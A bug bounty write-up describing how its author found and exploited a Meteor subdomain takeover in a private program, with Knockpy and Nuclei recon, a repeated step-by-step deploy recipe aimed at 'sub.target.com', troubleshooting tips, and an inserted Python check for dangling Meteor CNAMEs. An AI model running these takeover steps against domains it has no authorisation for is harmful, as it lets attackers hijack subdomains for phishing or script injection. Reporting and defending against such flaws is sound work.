In the name of Allah
Hi guys, I’m here again, YoungVanda. In this write-up, I’m gonna talk about Meteor Subdomain Takeover, from a simple recon to one of the trickiest exploitations of my life 😉
In this write-up, I explained everything from the beginning. If you just want to get to the exploitation part, check out the Exploitation heading at the end.
Also, if you haven’t read this write-up, give it a go. It’s a good write-up and it helped me a lot during the exploitation process.
The story
It was a private program, with this scope: *.redacted.com
The first thing I do when facing a small company/target is just running Knockpy to get the vibe of the domain. Like:
How many subdomains does it have!!!
Getting familiar with the subdomains and their naming patterns.
Is there any test/stage subdomain!?!
I ran Knockpy and it gave me a few subdomains. I just opened them manually.
- I use this Firefox extension for opening URLs manually, at the same time.
I found an interesting subdomain.
- I said OK baby. That’s fine. You’re good. Don’t worry :)
When I saw this page I said OK, usually these kinda messages can be a sign of Subdomain Takeover. I’m not a big fan of Subdomain Takeover, but I said why not!!! Let’s dive into it 🔥🔥🔥
Note:
When I face such web pages and I think they might be vulnerable to Subdomain Takeover, I usually check can-i-take-over-xyz.
Also, I run Nuclei for this purpose 😁 because Nuclei has lots of community templates when it comes to Subdomain Takeover.
Back to the story: I ran Nuclei, and after a second Nuclei told me, You’re a lucky boy😁 Just get out here man. Get out here.
- I was confused why no one had reported this before. I got the answer, follow me.
Why has no one reported this before?
can-i-take-over-xyz didn’t list the Meteor Takeover in its resources.
There was no write-up about it, except one, and you could not find it by Googling.
The only write-up was referenced in the Nuclei template. I even followed that write-up step by step, but it didn’t work.
How did I find the write-up?
In every Nuclei template, there is usually extra information about the vulnerability, sometimes even the way you can exploit it. So here is what I did to find the write-up:
- I love the reference section in templates.
cd nuclei-templates/
find . -name "template-name.yaml"
cat ./http/takeovers/template-name.yaml
Exploitation
Step — 1:
So I found the write-up, and the first thing I did according to the write-up was install Meteor:
# Other ways here: https://docs.meteor.com/install.html
# I installed this way
curl https://install.meteor.com/ | sh
- A successful installation.
Step — 2:
The next step is creating a Meteor application. I used this command:
# Execute the command with a normal user, not root.
mkdir poc && cd poc
meteor create --minimal .
Note:
To create a Meteor application you shouldn’t be the root user. That was one of my problems, so to make this work I used my Amazon VPS with an ubuntu/normal user.
Step — 3:
So far, all the required files have been created. Go and change the file client/main.html and put your flag there:
<platform-username> POC Takeover
nano client/main.html # Put your <platform-username> POC Takeover
Step — 4:
Now, go to www.meteor.com and sign up. Also, take note that you have to enter your payment details to be able to use the custom subdomain feature.
meteor login # Enter your username & password
Step — 5:
It’s time for the final step.
DEPLOY_HOSTNAME=[CNAME] meteor deploy [sub.target.com]
In the [CNAME] section you can put the CNAME of your subdomain.
- dig sub.target.com
But in my case, it didn’t work. You can try these:
# Didn't work for me
DEPLOY_HOSTNAME=eu-west-1.galaxy.meteor.com meteor deploy [sub.target.com]
# Didn't work for me
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy [sub.target.com]
# Worked for me
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy [sub.target.com]
How I found this galaxy.meteor.com
I was disappointed that I couldn’t take over the subdomain. Even though I spent around 10 hours, over two days, trying to exploit the vulnerability, I wasn’t successful. However, suddenly, I came up with an idea, but to me this was more like a shot in the dark :)
I discussed my problem on forums.meteor.com, just asking for some help :)
I explained my issue on the forum and waited for an answer. After 2 or 3 days someone replied to me.
I said OK, I’m gonna give it a try. I didn’t have that much hope.
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy travel.target.com
- Done
Finally, after 2 days of exploiting and 3 days of waiting for some help, it worked!!!
Man, the moment I realised that the application was being deployed I was over the moon.
It was marvellous. Like a beautiful woman in a red dress with red lipstick
- Like this woman:
- Ohhh, my bad, sorry, I meant this one:
Ultimate Final Hot Cooking Recipe:
- Ohhh, Mamacita, what a recipe !!! Yummy 😂😂😂
# Follow the steps with normal user, not root.
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
meteor create --minimal .
nano client/main.html # Put your <platform-username> POC Takeover
meteor login # Entering username and password - Sign-up here www.meteor.com
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If that didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work? Try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work? Try this one: ( this one worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Check out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you are still having problems deploying to the target, do the trick !!!
# Go to https://forums.meteor.com and ask for some help
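The defender’s counterpart to the recipe above, as an added example that is not part of the original write-up: a small Python check a zone owner can run over their own DNS export to find CNAMEs still pointing at the Meteor Galaxy hostnames named in this post (galaxy.meteor.com, galaxy-ingress.meteor.com and their regional variants) that no longer match a live deployment. The zone fragment, the origin example.com and the deployment inventory are constructed placeholders.

```python
import re
from typing import Dict, List, Set, Tuple

# Galaxy ingress hosts named in this write-up; regional variants are subdomains
# of these (see https://galaxy-guide.meteor.com/deploy-region.html).
GALAXY_SUFFIXES = ("galaxy.meteor.com", "galaxy-ingress.meteor.com")

# Constructed sample zone fragment for illustration only; not real records.
SAMPLE_ZONE = """\
; example.com zone (constructed sample)
www         300 IN A     203.0.113.10
travel      300 IN CNAME galaxy.meteor.com.
shop        300 IN CNAME eu-west-1.galaxy.meteor.com.
blog        300 IN CNAME ghs.googlehosted.com.
legacy-app  300 IN CNAME galaxy-ingress.meteor.com.
"""

# Hostnames the team really has deployed on Galaxy (constructed inventory).
DEPLOYED_ON_GALAXY: Set[str] = {"shop.example.com"}

# owner [ttl] [IN] CNAME target
CNAME_RE = re.compile(r"^(\S+)\s+(?:\d+\s+)?(?:IN\s+)?CNAME\s+(\S+)", re.IGNORECASE)


def parse_cnames(zone_text: str, origin: str) -> Dict[str, str]:
    """Return {fqdn: cname_target} for every CNAME record in a zone fragment."""
    records: Dict[str, str] = {}
    for raw in zone_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop comments and blank lines
        m = CNAME_RE.match(line)
        if not m:
            continue
        owner, target = m.group(1), m.group(2).rstrip(".").lower()
        fqdn = owner if owner.endswith(".") else f"{owner}.{origin}"
        records[fqdn.rstrip(".").lower()] = target
    return records


def points_to_galaxy(target: str) -> bool:
    """True if the CNAME target is a Galaxy host or a regional subdomain of one."""
    return any(target == s or target.endswith("." + s) for s in GALAXY_SUFFIXES)


def find_dangling(zone_text: str, origin: str, deployed: Set[str]) -> List[Tuple[str, str]]:
    """CNAMEs aimed at Galaxy whose owner has no matching deployment: remove or claim them."""
    return sorted((fqdn, target) for fqdn, target in parse_cnames(zone_text, origin).items()
                  if points_to_galaxy(target) and fqdn not in deployed)


if __name__ == "__main__":
    for fqdn, target in find_dangling(SAMPLE_ZONE, "example.com", DEPLOYED_ON_GALAXY):
        print(f"dangling Galaxy CNAME: {fqdn} -> {target}")
```

Anything this reports is a record to delete (or an app to redeploy under that hostname) before someone else registers it; it is exactly the gap that Nuclei flagged in the story.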
Severity/Priority of this Takeover
It was a private RDP program, so I really tried to escalate it to High/P2 by showing a Stored XSS scenario. But it didn’t work. They closed it as Medium/P3.
Triager said this:
- That is why they closed it as P3/Medium.
The errors you might get during the takeover
- After installing Meteor, create a directory and run the following steps in that directory
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
Create the Meteor application in a new directory and as a normal user, not root. Otherwise, you’re gonna get this error:
Create the Meteor application as a normal user.
ubuntu@369:~/$ mkdir poc && cd poc
ubuntu@369:~/poc$ meteor create --minimal .
- The last error you might encounter happens while deploying the application:
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If that didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work? Try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work? Try this one: ( this one worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Check out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you are still having problems deploying to the target, do the trick !!!
# Go to https://forums.meteor.com and ask for some help
Moral of the Story
The moment I realised that I was not able to take over the subdomain, after 7 or 8 hours of trying, I was really sad and just watched anime. I used to be lazy when it came to exploitation. But I didn’t give up, and the next day:
I watched multiple YouTube videos about how to deploy a Meteor application and even about Meteor itself.
I read documents from docs.meteor.com, just to figure out what was going on.
Finally, when I was disappointed, I explained my problem on the forum, forums.meteor.com, and waited for 2 or 3 days. And finally, someone answered my question and it actually worked.
Uooo man… Wait a minute, I tweet about my recent findings and some other bug bounty tips. So check out my Twitter account. Sorry, X account :)
My Twitter Account: @young_vanda_